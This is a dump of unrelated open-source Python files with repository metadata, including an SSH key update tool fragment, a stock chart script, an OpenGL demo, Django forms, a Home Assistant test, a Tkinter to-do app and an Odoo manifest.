def GenerateRootSshKeys(data, dry_run):
"""(Re-)generates the root SSH keys.
@type data: dict
@param data: Input data
@type dry_run: boolean
@param dry_run: Whether to perform a dry run
"""
generate_info = data.get(constants.SSHS_GENERATE)
if generate_info:
suffix = generate_info[constants.SSHS_SUFFIX]
if dry_run:
logging.info("This is a dry run, not generating any files.")
else:
common.GenerateRootSshKeys(SshUpdateError, _suffix=suffix)
def Main():
"""Main routine.
"""
opts = ParseOptions()
utils.SetupToolLogging(opts.debug, opts.verbose)
try:
data = common.LoadData(sys.stdin.read(), _DATA_CHECK)
# Check if input data is correct
common.VerifyClusterName(data, SshUpdateError, constants.SSHS_CLUSTER_NAME)
common.VerifyCertificateSoft(data, SshUpdateError)
# Update / Generate SSH files
UpdateAuthorizedKeys(data, opts.dry_run)
UpdatePubKeyFile(data, opts.dry_run)
GenerateRootSshKeys(data, opts.dry_run)
logging.info("Setup finished successfully")
except Exception, err: # pylint: disable=W0703
logging.debug("Caught unhandled exception", exc_info=True)
(retcode, message) = cli.FormatError(err)
logging.error(message)
return retcode
else:
return constants.EXIT_SUCCESS
|
[
"vs@ipatov.net"
] |
vs@ipatov.net
|
ce08b5951af442d5ac48612351d428e06a55e1e3
|
2ef93f98aef88475441e112223d127b583bc96ec
|
/tesla_ohlc.py
|
91125a3b6ff6b4d4e6ad12ce6a156a620543b75f
|
[] |
no_license
|
bluesealin/Machine-Learning
|
ba6d54ef82879f0cf5f3ef58a7bb9941d15e0e94
|
cc637c8901c384e70b7b1decac66ec4d245075c5
|
refs/heads/master
| 2021-05-03T07:42:55.966116
| 2018-01-17T17:41:05
| 2018-01-17T17:41:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,573
|
py
|
import datetime as dt
import matplotlib.pyplot as plt
from matplotlib import style
from matplotlib.finance import candlestick_ohlc
import matplotlib.dates as mdates
import pandas as pd
import pandas_datareader.data as web
style.use('ggplot')
# creating the csv file
#start = dt.datetime(2000, 1, 1)
#end = dt.datetime(2016, 12, 31)
#df = web.DataReader('TSLA', 'yahoo', start, end)
#df.to_csv('tsla.csv')
# column 0 (dates) will be the index column
df = pd.read_csv('tsla.csv', parse_dates=True, index_col=0)
# moving average will take the last 100 day prices and take the average of them today, min_periods will avoid NaN
# df['100ma'] = df['Adj Close'].rolling(window=100, min_periods=0).mean()
# resample
# OpenHighLowClose ex: 10Min, 6Min
df_ohlc = df['Adj Close'].resample('10D').ohlc()
df_volume = df['Volume'].resample('10D').sum()
# data based on 10 days
#print(df_ohlc.head())
# reset index and convert dates to mdates number so we can get the values
df_ohlc.reset_index(inplace=True)
df_ohlc['Date'] = df_ohlc['Date'].map(mdates.date2num)
# ploting w/ matplotlib and taking the values w/ pandas
# rows x columns gridsize staring
ax1 = plt.subplot2grid((6,1), (0,0), rowspan=5, colspan=1)
ax2 = plt.subplot2grid((6,1), (5,0), rowspan=1, colspan=1, sharex=ax1)
# this will display beatiful dates
ax1.xaxis_date()
candlestick_ohlc(ax1, df_ohlc.values, width=2, colorup='g')
# x = df_volume.index.map(mdates.date2num), y = df_volume.values, fill from 0 to y
ax2.fill_between(df_volume.index.map(mdates.date2num), df_volume.values, 0)
plt.show()
|
[
"lucasdraichi@gmail.com"
] |
lucasdraichi@gmail.com
|
29b750bb302001c9849c94b7e2eeb31a1216aadf
|
25a4df7d63285564159a2c9d5b48a66e767c09f9
|
/test_triangle.py
|
1ce21821c7abd08bbac558ff344f2410fb0a0767
|
[
"MIT"
] |
permissive
|
philetus/superNormal
|
c82677c81359e92f33810660fa5aa45161004a71
|
b6df64c2ef4838b8a2080fae0be57cfee40ccf7a
|
refs/heads/master
| 2020-03-20T06:07:10.998229
| 2018-06-13T16:27:41
| 2018-06-13T16:42:02
| 137,239,304
| 0
| 0
| null | 2018-06-13T16:05:38
| 2018-06-13T16:05:38
| null |
UTF-8
|
Python
| false
| false
| 1,406
|
py
|
import glfw
import OpenGL.GL as gl
def main():
# Initialize the library
if not glfw.init():
return
# Create a windowed mode window and its OpenGL context
window = glfw.create_window(640, 480, "Hello World", None, None)
if not window:
glfw.terminate()
return
# Make the window's context current
glfw.make_context_current(window)
# Loop until the user closes the window
while not glfw.window_should_close(window):
# Render here, e.g. using pyOpenGL
width, height = glfw.get_framebuffer_size(window)
ratio = width / float(height)
gl.glViewport(0, 0, width, height)
gl.glClear(gl.GL_COLOR_BUFFER_BIT)
gl.glMatrixMode(gl.GL_PROJECTION)
gl.glLoadIdentity()
gl.glOrtho(-ratio, ratio, -1, 1, 1, -1)
gl.glMatrixMode(gl.GL_MODELVIEW)
gl.glLoadIdentity()
# gl.glRotatef(glfw.glfwGetTime() * 50, 0, 0, 1)
gl.glBegin(gl.GL_TRIANGLES)
gl.glColor3f(1, 0, 0)
gl.glVertex3f(-0.6, -0.4, 0)
gl.glColor3f(0, 1, 0)
gl.glVertex3f(0.6, -0.4, 0)
gl.glColor3f(0, 0, 1)
gl.glVertex3f(0, 0.6, 0)
gl.glEnd()
# Swap front and back buffers
glfw.swap_buffers(window)
# Poll for and process events
glfw.poll_events()
glfw.terminate()
if __name__ == "__main__":
main()
|
[
"cheeriocheng@gmail.com"
] |
cheeriocheng@gmail.com
|
4a1dff1fff68c27fb3452129c56f54a62957e1cf
|
716c453110217e4b478823940b6ce773fe837b3b
|
/BlogProject/school_project/users/forms.py
|
a8b4b32dc1500efcd07e0eadc0894aef874ace31
|
[] |
no_license
|
Mateaus/blog_site
|
e9a46ac581a65c2b563ff18090480f775a5ad9cf
|
305bafbd18c2a260589da77d8e162fb36994357b
|
refs/heads/master
| 2020-05-07T11:59:47.008936
| 2019-04-11T17:42:58
| 2019-04-11T17:42:58
| 180,485,036
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 652
|
py
|
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
from .models import Profile
# changing form to include email field
class UserRegisterForm(UserCreationForm):
email = forms.EmailField()
class Meta:
model = User
fields = ['username', 'email', 'password1', 'password2']
class UserUpdateForm(forms.ModelForm):
email = forms.EmailField()
class Meta:
model = User
fields = ['username', 'email']
class ProfileUpdateForm(forms.ModelForm):
class Meta:
model = Profile
fields = ['image']
|
[
"noreply@github.com"
] |
noreply@github.com
|
4b18b019b2ff1da71c7219f94ea175182cf795a4
|
bd14632342076a8099dbbd51c1b0c71bc8352b6a
|
/main.py
|
85a29f77583d8b29671e15d3c458dd515102c514
|
[
"MIT"
] |
permissive
|
nlehuen/led_display
|
511fbb3f2d0260d4ae60f3a2e6a99d366d927281
|
6f77ac919f9f3d3972646a6f26907fefb79a3be2
|
refs/heads/master
| 2021-01-22T02:48:00.386193
| 2013-09-19T08:02:41
| 2013-09-19T08:02:41
| 5,821,282
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,604
|
py
|
# -*- coding: utf-8 -*-
import time
import traceback
import json
from configuration import Configuration
import animator
import animations
import importlib
# Try to load Twitter animations
try:
import animations.tweet
except ImportError:
print "Please install twitter module from http://pypi.python.org/pypi/twitter/"
animations.tweet = None
if __name__ == '__main__':
# Load configuration
configuration = Configuration.load('configuration.json')
# Try to connect to LED display through serial port
display = None
try:
import leddisplay
display = leddisplay.Display(
port = configuration.leddisplay.port.required().encode(),
speed = configuration.leddisplay.speed.required(),
threaded = True
)
except leddisplay.serial.SerialException, e:
print "Could not connect to serial port, launching display emulator"
print "\t%s"%e
except:
traceback.print_exc()
# If connection to LED display was not successfull,
# launch the emulator
if display is None:
import tkdisplay
display = tkdisplay.Display(
(
configuration.tkdisplay.width.value(32),
configuration.tkdisplay.height.value(16)
),
configuration.tkdisplay.scale.value(4)
)
# Create the animator
animator = animator.Animator(
display,
configuration.animator
)
# For the moment, run the animator in the main thread
try:
animator.mainloop()
finally:
display.close()
|
[
"nlehuen@google.com"
] |
nlehuen@google.com
|
df7f090efeff95de6885e079eb45d56b1f1a4a2d
|
1a8d1f8c16fb2842a0b0f71b7860f0bff8e6d257
|
/car_report/__manifest__.py
|
02c686e7de5aa9cc9cb002abd93c5923d5e67add
|
[] |
no_license
|
vidtsin/odoo-leasing
|
85a288e4d47697591397b892cb65d911987aa991
|
5fd7a2fe23ae47d992bc03a9e474c08363c78b9e
|
refs/heads/master
| 2020-08-03T04:37:39.587593
| 2019-07-28T14:25:14
| 2019-07-28T14:25:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 738
|
py
|
# -*- coding: utf-8 -*-
{
'name': 'Car Report',
'version': '0.1',
'summary': 'Show car reports',
'sequence': 30,
'description': """
car
====================
The specific and easy-to-use car system in Odoo allows you to keep track of your vehicle.
""",
'category': 'car',
'website': '',
'author': "Cedric FOWOUE",
'images': [
'static/src/img/icon.png',
],
'depends': ['car_contract', 'car_payment'],
'data': [
'security/ir.model.access.csv',
'views/car_report.xml',
],
'qweb': [
"static/src/xml/car_report.xml",
"static/src/xml/car_report_follow.xml",
],
'installable': True,
'application': False,
'auto_install': False,
}
|
[
"cedvict@gmail.com"
] |
cedvict@gmail.com
|
f2364a1f5e0049d916164fd82672d551cdfff20d
|
436568fbadd6f52fb5388136a67eef75d86bc6a7
|
/Python3_Mundo2_Introdução ao Mundo 2/Python3_Mundo2_Aula15_Interrompendo repetições while/Desafio068.py
|
f36c743d48b38c87c1b3a887d28b18324ddafa96
|
[
"MIT"
] |
permissive
|
AgladeJesus/python
|
3c72cddaf4e3c92464b5cee7975bd56a764b5f5c
|
16e4e5cc43aa987858a4719748708d6d5327d75d
|
refs/heads/master
| 2023-08-31T08:34:17.069874
| 2021-09-08T08:45:05
| 2021-09-08T08:45:05
| 377,415,579
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 944
|
py
|
from random import randint
print('Olá, caro jogador, sou o computador, e quero dispultar com você no Impar/Par.')
v = 0
while True:
jogador = int(input('Digita um número de 1 a 10: '))
cp = randint(0, 10)
total = jogador + cp
tipo = ' '
while tipo not in 'PI':
tipo = str(input('Par ou ìmpar: [P/I]: ')).strip().upper()[0]
print(f'Você jogou {jogador} e o computador {cp}, o total é {total}', end=' ')
print('DEU PAR' if total % 2 == 0 else 'DEU ÍMPAR')
if tipo == 'P':
if total % 2 == 0:
print('Você VENCEU!!')
v += 1
else:
print('Você PERDEU!!')
break
elif tipo == 'I':
if total % 2 == 1:
print('Você VENCEU!!')
v += 1
else:
print('Você PERDEU!!')
break
if v > 0:
print(f'Você tem {v} votórias')
else:
print(' ')
print('Vamos jogar novamente...')
|
[
"agladejesus@gmail.com"
] |
agladejesus@gmail.com
|
bff704cfdcc8f2836f96e353d4860b781fb0d8a3
|
3793afb30d9e4ec39a75b2e5618cd6a2eaed0737
|
/portal system/synapse/synapse/rest/key/v1/server_key_resource.py
|
6df46969c4548ae5037bf6630d13f802cdf3c600
|
[
"Apache-2.0"
] |
permissive
|
rubyspiderman/chatsystem_reactjs
|
16a49a2026b70d0556105b02248362bbbfbfc1f9
|
a20edf38b83fe8c2ee36c2a7f3e1f7263dd134e1
|
refs/heads/master
| 2021-01-01T05:18:08.870728
| 2016-05-13T08:33:59
| 2016-05-13T08:33:59
| 58,717,217
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,996
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2014, 2015 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from twisted.web.resource import Resource
from synapse.http.server import respond_with_json_bytes
from signedjson.sign import sign_json
from unpaddedbase64 import encode_base64
from canonicaljson import encode_canonical_json
from OpenSSL import crypto
import logging
logger = logging.getLogger(__name__)
class LocalKey(Resource):
"""HTTP resource containing encoding the TLS X.509 certificate and NACL
signature verification keys for this server::
GET /key HTTP/1.1
HTTP/1.1 200 OK
Content-Type: application/json
{
"server_name": "this.server.example.com"
"verify_keys": {
"algorithm:version": # base64 encoded NACL verification key.
},
"tls_certificate": # base64 ASN.1 DER encoded X.509 tls cert.
"signatures": {
"this.server.example.com": {
"algorithm:version": # NACL signature for this server.
}
}
}
"""
def __init__(self, hs):
self.hs = hs
self.version_string = hs.version_string
self.response_body = encode_canonical_json(
self.response_json_object(hs.config)
)
Resource.__init__(self)
@staticmethod
def response_json_object(server_config):
verify_keys = {}
for key in server_config.signing_key:
verify_key_bytes = key.verify_key.encode()
key_id = "%s:%s" % (key.alg, key.version)
verify_keys[key_id] = encode_base64(verify_key_bytes)
x509_certificate_bytes = crypto.dump_certificate(
crypto.FILETYPE_ASN1,
server_config.tls_certificate
)
json_object = {
u"server_name": server_config.server_name,
u"verify_keys": verify_keys,
u"tls_certificate": encode_base64(x509_certificate_bytes)
}
for key in server_config.signing_key:
json_object = sign_json(
json_object,
server_config.server_name,
key,
)
return json_object
def render_GET(self, request):
return respond_with_json_bytes(
request, 200, self.response_body,
version_string=self.version_string
)
def getChild(self, name, request):
if name == '':
return self
|
[
"rubyspiderman@hotmail.com"
] |
rubyspiderman@hotmail.com
|
21b5c899a32d5a276c1913f41db7bb2bdd4114a1
|
f4b2f6f8c82ba00a79712292cae159edd6e93316
|
/python_voc_parser/__init__.py
|
e8b5a4dd78a5f1211bf1167cf90337dde6e4acf9
|
[
"MIT"
] |
permissive
|
gabrielrezzonico/python_voc_parser
|
31e5d016cce8a77e3cbd302f34f677ba1ca934c1
|
dd645402e40d3e18a33375f0fe92201013343110
|
refs/heads/master
| 2021-01-19T11:17:56.598529
| 2017-04-12T19:10:53
| 2017-04-12T19:10:53
| 87,950,887
| 7
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 163
|
py
|
"""Utilities"""
from . import helpers
from . import voc_annotations_parser
# Globally-importable utils.
from .voc_annotations_parser import VocAnnotationsParser
|
[
"gabrielrezzonico@gmail.com"
] |
gabrielrezzonico@gmail.com
|
94661a6524510a11b67815c32e25b75865809f16
|
ff8f1bb7be35166965ca624681f5a522b60de306
|
/medical/migrations/0011_hivemedicalrecords_user.py
|
d96926b9bc913bd8a627d1877f0c5b6cac1215d9
|
[] |
no_license
|
jonathanw82/thehoneycombAM
|
8f6b2e43d7c429b8dd1c4655e7212d4a5c9f7303
|
5a20efd9dcc6f81d1773c01c218a92732a815903
|
refs/heads/master
| 2023-04-10T06:33:48.462700
| 2021-04-12T11:40:56
| 2021-04-12T11:40:56
| 294,968,786
| 1
| 1
| null | 2021-02-16T14:25:58
| 2020-09-12T15:16:27
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 521
|
py
|
# Generated by Django 3.1.3 on 2021-01-21 16:51
import django.contrib.auth.models
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('medical', '0010_auto_20210112_1633'),
]
operations = [
migrations.AddField(
model_name='hivemedicalrecords',
name='user',
field=models.CharField(default=1, max_length=50, verbose_name=django.contrib.auth.models.User),
preserve_default=False,
),
]
|
[
"jonwhewaycode@outlook.com"
] |
jonwhewaycode@outlook.com
|
0fdfd0a2fe0d2384fb8bf820f0da8991e1d1fce7
|
0a6f6cf66643975895b099004d45aeef6c454c0f
|
/sshc/modelPredict.py
|
8a20d7116d5d2059355091de88d95c096d89c681
|
[] |
no_license
|
hpqcp/Dryer-Project1
|
1f2a1d8bb22f1ab2af00087e9130a691e6cb052f
|
a0fbad8a45d6d03919cdc9f32d53da9879a7c36b
|
refs/heads/master
| 2020-04-29T02:17:06.052118
| 2020-02-25T06:42:27
| 2020-02-25T06:42:27
| 175,760,880
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,810
|
py
|
#
#
#
import pandas as pd
#
#
#return: 训练后模型 , 标准化对象X , 标准化对象y
def randomForest_model(_xTrain: object, _yTrain: object) -> object:
from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import RandomForestRegressor
# 训练数据和测试数据进行标准化处理
ss_x = StandardScaler()
x_train = ss_x.fit_transform(_xTrain)
# x_test = ss_x.transform(_xTest)
ss_y = StandardScaler()
y_train = ss_y.fit_transform(_yTrain.reshape(-1, 1))
# y_test = ss_y.transform(_yTest.reshape(-1, 1))
#生成模型
rf_model = RandomForestRegressor(n_jobs=-1)
rf_model.fit(x_train, y_train)
return rf_model,ss_x,ss_y
#
#
#
def randomForest_predict_score(_model: object, _ssx: object, _ssy: object, _xTest: object, _yTest: object, _isPlot: object = False) -> object:
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import r2_score, mean_squared_error, mean_absolute_error
import chart.plot as plt
# rfr,ss_x,ss_y = randomForest_model(_xTrain,_yTrain)
xTest1 = _ssx.transform(_xTest)
y_predict = _model.predict(xTest1)
df_p = pd.DataFrame(_ssy.inverse_transform(y_predict)) # 将标准化后的数据转换为原始数据。
# df_t = pd.DataFrame(_ssy.inverse_transform(_yTest)) # 将标准化后的数据转换为原始数据。
df_t = pd.DataFrame(_yTest)
df = pd.concat([df_t, df_p], axis=1,ignore_index=True)
if _isPlot:
plt.pairPlot(df)
r2 = r2_score(df.values[:, 0], df.values[:, 1])
mse = mean_squared_error(df.values[:, 0], df.values[:, 1])
mae = mean_absolute_error(df.values[:, 0], df.values[:, 1])
return {'R2':r2,'MSE':mse,'MAE':mae},df
#
def model_load(_path=None):
from sklearn.externals import joblib
if _path == None :
raise Exception('模型加载路径为空!')
try:
model = joblib.load(_path)
except:
raise Exception('模型加载错误!')
else:
return model
#
#
def model_save(_model=None,_path=None):
from sklearn.externals import joblib
if _model==None or _path == None :
raise Exception('模型或保存路径为空!')
try:
joblib.dump(_model,_path)
except:
raise Exception('模型保存错误!')
else:
return
#parm : 1.
#return : 1.得分数组 2.评价得分
def cross_score(_x,_y,_n):
from sklearn import metrics
from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import KFold
from sklearn.model_selection import cross_val_score
# 训练数据和测试数据进行标准化处理
ss_x = StandardScaler()
x1 = ss_x.fit_transform(_x)
ss_y = StandardScaler()
y1 = ss_y.fit_transform(_y.reshape(-1, 1))
randomForest_model = RandomForestRegressor()
kf = KFold(n_splits=_n, shuffle=True)
score_ndarray = cross_val_score(randomForest_model, x1, y1, cv=kf)
return score_ndarray,score_ndarray.mean()
#
#
#
def feature_selection_sshc(_x,_y):
from sklearn.ensemble import RandomForestRegressor
from sklearn.feature_selection import SelectFromModel
from sklearn.preprocessing import StandardScaler
#训练数据和测试数据进行标准化处理
ss_x = StandardScaler()
x1 = ss_x.fit_transform(_x)
ss_y = StandardScaler()
y1 = ss_y.fit_transform(_y.reshape(-1, 1))
clf = RandomForestRegressor()
clf = clf.fit(x1, y1)
return clf.feature_importances_ # 显示每一个特征的重要性指标,越大说明越重要,可以看出,第三第四两个特征比较重要
#
#
#
#
def searchCV(_x,_y,_testSize=0.25):
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import r2_score,mean_squared_error,mean_absolute_error
import chart.plot as plt
# 随机采样25%作为测试 75%作为训练
# x_train, x_test, y_train, y_test = train_test_split(df_x, df_y, test_size=_testSize, random_state=33)
# randomForest_predict(x_train,y_train,x_test,y_test)
#
#
#
if __name__ == "__main__":
__spec__ = None
import utils.excel2redis as rds
import sshc.timeAlignment as timeAlign
import numpy as np
df = rds.getBatchData('4000-2019-10-08*', 1)
df1 = pd.DataFrame(df.values[:, [3, 1, 6, 10, 11, 12, 13, 14, 17]])
df2 = pd.DataFrame(df1,dtype=np.float)
pointDiffList = [0,80,34,17,52,14,3,21,52]
df3=timeAlign.time_align_transform(df2,pointDiffList)
df_y = df3.values[:,0]
df_x = df3.values[:,1:]
#
# model , StandardScaler_x,StandardScaler_y = randomForest_model(df_x,df_y)
# model_save(model,'c://model1.m')
# model_save(StandardScaler_x, 'c://ssx1.m')
# model_save(StandardScaler_y, 'c://ssy1.m')
from sklearn.externals import joblib
model = joblib.load('c://model1.m')
ssx = joblib.load('c://ssx1.m')
ssy = joblib.load('c://ssy1.m')
scores = randomForest_predict_score(model,ssx,ssy, df_x, df_y, _isPlot=True)
# fi = model.feature_importances_
# feature_selection_sshc(df_x,df_y)
#scores,mean_score = cross_score(df_x,df_y,10)
#searchCV(df_x,df_y,_testSize=0.2)
# import chart.plot as plt
# plt.pairPlot(DataFrame(df_y))
# df_train_x = df3.values[200:1500,1:]
# df_train_y = df3.values[200:1500, 0]
# df_test_x = df3.values[200:399,1:]
# df_test_y = df3.values[200:399, 0]
# randomForest_predict(df_train_x,df_train_y,df_test_x,df_test_y)
# time_align_fit(df1,[0,10,20,30,40,50,60,70,80,90,100])
print
|
[
"14499382@qq.com"
] |
14499382@qq.com
|
dcfd08920d5d8dc25f09f1674d7a69c10ecedbb1
|
1bed2f766620acf085ed2d7fd3e354a3482b8960
|
/tests/components/sensibo/test_entity.py
|
818d9ddb92499f60c743ebd9a3a8e50177e03817
|
[
"Apache-2.0"
] |
permissive
|
elupus/home-assistant
|
5cbb79a2f25a2938a69f3988534486c269b77643
|
564150169bfc69efdfeda25a99d803441f3a4b10
|
refs/heads/dev
| 2023-08-28T16:36:04.304864
| 2022-09-16T06:35:12
| 2022-09-16T06:35:12
| 114,460,522
| 2
| 2
|
Apache-2.0
| 2023-02-22T06:14:54
| 2017-12-16T12:50:55
|
Python
|
UTF-8
|
Python
| false
| false
| 2,826
|
py
|
"""The test for the sensibo entity."""
from __future__ import annotations
from unittest.mock import patch
from pysensibo.model import SensiboData
import pytest
from homeassistant.components.climate.const import (
ATTR_FAN_MODE,
DOMAIN as CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
)
from homeassistant.components.sensibo.const import SENSIBO_ERRORS
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import ATTR_ENTITY_ID
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import device_registry as dr, entity_registry as er
async def test_entity(
hass: HomeAssistant, load_int: ConfigEntry, get_data: SensiboData
) -> None:
"""Test the Sensibo climate."""
state1 = hass.states.get("climate.hallway")
assert state1
dr_reg = dr.async_get(hass)
dr_entries = dr.async_entries_for_config_entry(dr_reg, load_int.entry_id)
dr_entry: dr.DeviceEntry
for dr_entry in dr_entries:
if dr_entry.name == "Hallway":
assert dr_entry.identifiers == {("sensibo", "ABC999111")}
device_id = dr_entry.id
er_reg = er.async_get(hass)
er_entries = er.async_entries_for_device(
er_reg, device_id, include_disabled_entities=True
)
er_entry: er.RegistryEntry
for er_entry in er_entries:
if er_entry.name == "Hallway":
assert er_entry.unique_id == "Hallway"
@pytest.mark.parametrize("p_error", SENSIBO_ERRORS)
async def test_entity_failed_service_calls(
hass: HomeAssistant,
p_error: Exception,
load_int: ConfigEntry,
get_data: SensiboData,
) -> None:
"""Test the Sensibo send command with error."""
state = hass.states.get("climate.hallway")
assert state
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
{ATTR_ENTITY_ID: state.entity_id, ATTR_FAN_MODE: "low"},
blocking=True,
)
await hass.async_block_till_done()
state = hass.states.get("climate.hallway")
assert state.attributes["fan_mode"] == "low"
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
side_effect=p_error,
):
with pytest.raises(HomeAssistantError):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
{ATTR_ENTITY_ID: state.entity_id, ATTR_FAN_MODE: "low"},
blocking=True,
)
state = hass.states.get("climate.hallway")
assert state.attributes["fan_mode"] == "low"
|
[
"noreply@github.com"
] |
noreply@github.com
|
3459276818ce07479d8a250a648e51b33e116764
|
c9ca065c2674ca30c12a90ceab88ac5798646473
|
/weather/weather.py
|
0911597edd9300a64cc9034898c72555e919512b
|
[] |
no_license
|
mshazman/data_munging
|
beaa389ad3de48d52f1f2ef03ed4ba7f04c77698
|
f4f815a896f8f7a6957ebbb22369dd760e95072e
|
refs/heads/master
| 2020-07-23T17:03:01.970331
| 2019-09-10T19:07:20
| 2019-09-10T19:07:20
| 207,640,211
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 590
|
py
|
"""This Module have class to perform all calculation realted to weather"""
import calculation
class WeatherCalculation(calculation.Computation):
"""class object takes data in form of dictionary and apply functions on it"""
def __init__(self, weather_data):
self.weather_data = weather_data
def min_spread_day(self):
"""Function Return day on with temp diffrence is minimum"""
min_value = self.compute_min_value(self.weather_data)
min_value_key = self.compute_min_value_key(min_value, self.weather_data)
return min_value, min_value_key
|
[
"="
] |
=
|
5311ad2fb6847110b4a1606ef629ada8e3ae8b27
|
688ae097a1f413f82c4a4f2840153e261a8504d4
|
/main.spec
|
c69f5a6d2fd675096c0caa96c2e7cf7cb3a26355
|
[
"MIT"
] |
permissive
|
Danverr/DeliveryCalc
|
f1225401db3e47733199044800f6752c06933550
|
c4384fc2a991817e09707288006937bd45183d71
|
refs/heads/master
| 2020-09-16T01:53:49.359474
| 2019-11-23T16:12:38
| 2019-11-23T16:12:38
| 223,615,248
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,240
|
spec
|
# -*- mode: python -*-
block_cipher = None
a = Analysis(['DeliveryCalc.py'],
pathex=['.'],
binaries=[],
hiddenimports=['Code/*.pyd'],
hookspath=[],
runtime_hooks=[],
excludes=[],
win_no_prefer_redirects=False,
win_private_assemblies=False,
cipher=block_cipher)
pyz = PYZ(a.pure, a.zipped_data,
cipher=block_cipher)
Key = ['mkl','libopenblas']
def remove_from_list(input, keys):
outlist = []
for item in input:
name, _, _ = item
flag = 0
for key_word in keys:
if name.find(key_word) > -1:
flag = 1
if flag != 1:
outlist.append(item)
return outlist
a.binaries = remove_from_list(a.binaries, Key)
exe = EXE(pyz,
a.scripts,
exclude_binaries=True,
name='DeliveryCalc',
debug=False,
strip=False,
upx=True,
console=True )
coll = COLLECT(exe,
a.binaries,
a.zipfiles,
a.datas,
strip=False,
upx=True,
name='DeliveryCalc')
|
[
"noreply@github.com"
] |
noreply@github.com
|
eab2e26261a3cbc0a255243129e8e1698d3489e8
|
7f6e573bfe32c1085311a13c79f7c1e2d7a83f79
|
/00977 - Squares of a Sorted Array/solutions.py
|
dcc18552d2afcdc3ec33bd0f108a38b8b4318d50
|
[] |
no_license
|
ngoyal16/LeetCode
|
0b7366c566996422ca7b89c3b0540e494aab4e9f
|
747b902224bd3ded576a67c926cc1fbb458a97d3
|
refs/heads/master
| 2022-12-10T08:34:19.590452
| 2022-12-07T08:28:05
| 2022-12-07T08:28:05
| 175,677,750
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 198
|
py
|
class Solution(object):
def sortedSquares(self, A):
"""
:type A: List[int]
:rtype: List[int]
"""
return map(lambda x: x * x, sorted(A, key=abs))
|
[
"noreply@github.com"
] |
noreply@github.com
|
ff4ba646859730beeecd4cb569fbc5a89f48be03
|
ce7bb5ba72569d1503a54551ce99bb45addd9d15
|
/components/main window (1).py
|
c3e235727794891b14f8b40a59c1877b74f24f77
|
[] |
no_license
|
vic025/todo
|
4fe620ace4704cacfba270494782a166bfd2aa5a
|
56872e1de1ae12fd2c8c10ac3055737372ae3445
|
refs/heads/master
| 2023-07-01T17:58:23.010349
| 2021-08-06T23:06:37
| 2021-08-06T23:06:37
| 363,345,349
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,021
|
py
|
# GUI of main window without functionality
import tkinter as tk
from tkinter.font import Font
from tkinter import *
from tkmacosx import Button, CircleButton
from PIL import Image, ImageTk
root = tk.Tk()
root.title('To-do List')
root.geometry('370x500+600+75')
root.resizable(False, False)
# Title (1)
# Font size and weight for the title
title_label_font = Font(
family="SF Pro Rounded",
size=20,
weight="bold"
)
# Title name
title_label = tk.Label(root, text="To-do List",
font=title_label_font)
title_label.place(x=30, y=25)
# Inputs (1)
# Task name entry
new_task_entry = Entry(root, width=11)
new_task_entry.place(x=35, y=75)
# Time entry
new_task_entry_1 = Entry(root, width=5)
new_task_entry_1.place(x=156, y=75)
# Date entry
new_task_entry_2 = Entry(root, width=7)
new_task_entry_2.place(x=223, y=75)
# List (1)
list_tasks = tk.Listbox(width=29, height=16)
list_tasks.place(x=35, y=125)
# Buttons (1)
# Add task button
add_image = ImageTk.PhotoImage(
Image.open("/Users/vic/PycharmProjects/todo/images/add.png"))
add_task_button = CircleButton(root, image=add_image, bg='#ffffff',
fg='#000000', borderless=1, width=35)
add_task_button.place(x=308, y=71)
# Delete selected task button
delete_selected = Button(root, text="Delete", bg='#ffffff',
fg='#000000', borderless=1,
activebackground=('#C96666', '#C96666'))
delete_selected.place(x=35, y=423)
# Delete all tasks
delete_all = Button(root, text="Delete all", bg='#ffffff',
fg='#000000', borderless=1,
activebackground=('#C96666', '#C96666'))
delete_all.place(x=134, y=423)
# Settings button
settings_image = ImageTk.PhotoImage(
Image.open("/Users/vic/PycharmProjects/todo/images/settings.png"))
settings_button = CircleButton(root, image=settings_image, bg='#ffffff',
fg='#000000', borderless=1, width=35)
settings_button.place(x=308, y=418)
root.mainloop()
|
[
"v1q025@gmail.com"
] |
v1q025@gmail.com
|
cb8e8814cc62f4c8391fcb723e8027d1860d330b
|
e8c16328e22b8ccda2e3d2998d2ec1689d79914b
|
/exercise_2017/5th_week/test_1.py
|
